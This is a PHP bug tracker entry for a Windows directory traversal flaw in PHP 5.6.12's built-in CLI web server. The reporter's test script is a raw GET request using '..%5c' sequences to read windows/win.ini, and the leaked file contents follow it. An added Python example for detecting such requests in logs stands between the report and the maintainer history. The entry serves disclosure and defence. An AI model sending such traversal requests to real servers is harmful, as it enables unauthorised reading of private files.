Bug #70264 CLI server directory traversal
Submitted: 2015-08-14 00:05 UTC Modified: 2015-08-14 11:34 UTC
From: jplopezy at gmail dot com Assigned: cmb (profile)
Status: Closed Package: Built-in web server
PHP Version: 5.6.12 OS: Windows only
Private report: No CVE-ID: None
 [2015-08-14 00:05 UTC] jplopezy at gmail dot com
Description:
------------
The bug is in the local PHP web server for testing (http://php.net/manual/es/features.commandline.webserver.php)

The documentation says that this web server is only for testing, but on a LAN this issue may allow stealing files from the developers, or maybe some other people use this PHP web server in production.

Test script:
---------------
You only need to send this request

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Expected result:
----------------
Don't display files that escape from the webserver directory.

Actual result:
--------------
Response with my win.ini


; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


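The report's request works because `..%5c` percent-decodes to `..\`, and on Windows the filesystem treats `\` as a directory separator while a check that only understands `/` does not. The following is an added example written for this page; it is not the reporter's script and not the fix from the php-src commit referenced below (that diff is not shown here). It resolves a request path lexically, treating both separators as directory boundaries, and flags any path that climbs above the document root. It also goes beyond the page's single case: one round of percent-decoding means `%2e%2e` and `%2f` spellings are caught as well. The log lines, the `SAMPLE_LOG_LINES` name and the helper function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed example data: the request path from this bug report plus a few
# ordinary requests in common-log-format shape. Not part of the original report.
SAMPLE_LOG_LINES = [
    '127.0.0.1 - - [14/Aug/2015:00:05:00 +0000] "GET /index.php HTTP/1.1" 200 1234',
    '127.0.0.1 - - [14/Aug/2015:00:05:01 +0000] "GET /..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1" 200 512',
    '127.0.0.1 - - [14/Aug/2015:00:05:02 +0000] "GET /css/../app.css HTTP/1.1" 200 88',
]

# Extracts the request line ("METHOD path HTTP/x.y") from a log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d"')


def resolve_request_path(raw_path, backslash_is_separator=True):
    """Lexically resolve a request path against an implicit document root.

    Returns the list of path segments below the document root, or None if
    the path climbs above it. The path is percent-decoded once so that
    encoded dots and slashes (%2e, %2f, %5c) are seen for what they are.
    With backslash_is_separator=True, '\\' is treated as a directory
    separator, as the Windows filesystem does; with it False the function
    behaves like a naive check that only understands '/'.
    """
    path = raw_path.split("?", 1)[0]      # ignore the query string
    decoded = unquote(path)
    if backslash_is_separator:
        decoded = decoded.replace("\\", "/")
    segments = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue                      # empty or current-directory segment
        if seg == "..":
            if not segments:
                return None               # would leave the document root
            segments.pop()
        else:
            segments.append(seg)
    return segments


def is_safe_request_path(raw_path, backslash_is_separator=True):
    """True if the request stays inside the document root."""
    return resolve_request_path(raw_path, backslash_is_separator) is not None


def find_traversal_requests(log_lines):
    """Return the raw request paths in access-log lines that would escape
    the document root under Windows separator rules (for detection)."""
    flagged = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if m and not is_safe_request_path(m.group("path")):
            flagged.append(m.group("path"))
    return flagged


if __name__ == "__main__":
    for path in find_traversal_requests(SAMPLE_LOG_LINES):
        print("traversal attempt:", path)
```

Calling `resolve_request_path` on the report's path with `backslash_is_separator=False` returns a segment list, which is the naive behaviour that let the request through; with the default it returns None. A lexical check like this is a pre-filter only: the server should still open the file via its canonical real path and confirm that path is inside the document root.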
History
 [2015-08-14 00:16 UTC] stas@php.net
-Type: Security +Type: Bug
 [2015-08-14 00:16 UTC] stas@php.net
The CLI server is a debugging server, so it should not be used in a production context.
 [2015-08-14 11:34 UTC] cmb@php.net
-Summary: PHP 5.6.12 directory traversal +Summary: CLI server directory traversal
-Status: Open +Status: Verified
-Package: HTTP related +Package: Built-in web server
-Operating System: Windows 7 +Operating System: Windows only
-Assigned To: +Assigned To: cmb
 [2015-08-14 15:20 UTC] cmb@php.net
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 [2015-08-14 15:20 UTC] cmb@php.net
-Status: Verified +Status: Closed
 [2015-08-14 15:21 UTC] cmb@php.net
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 [2015-08-18 16:24 UTC] ab@php.net
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Dec 03 17:01:29 2024 UTC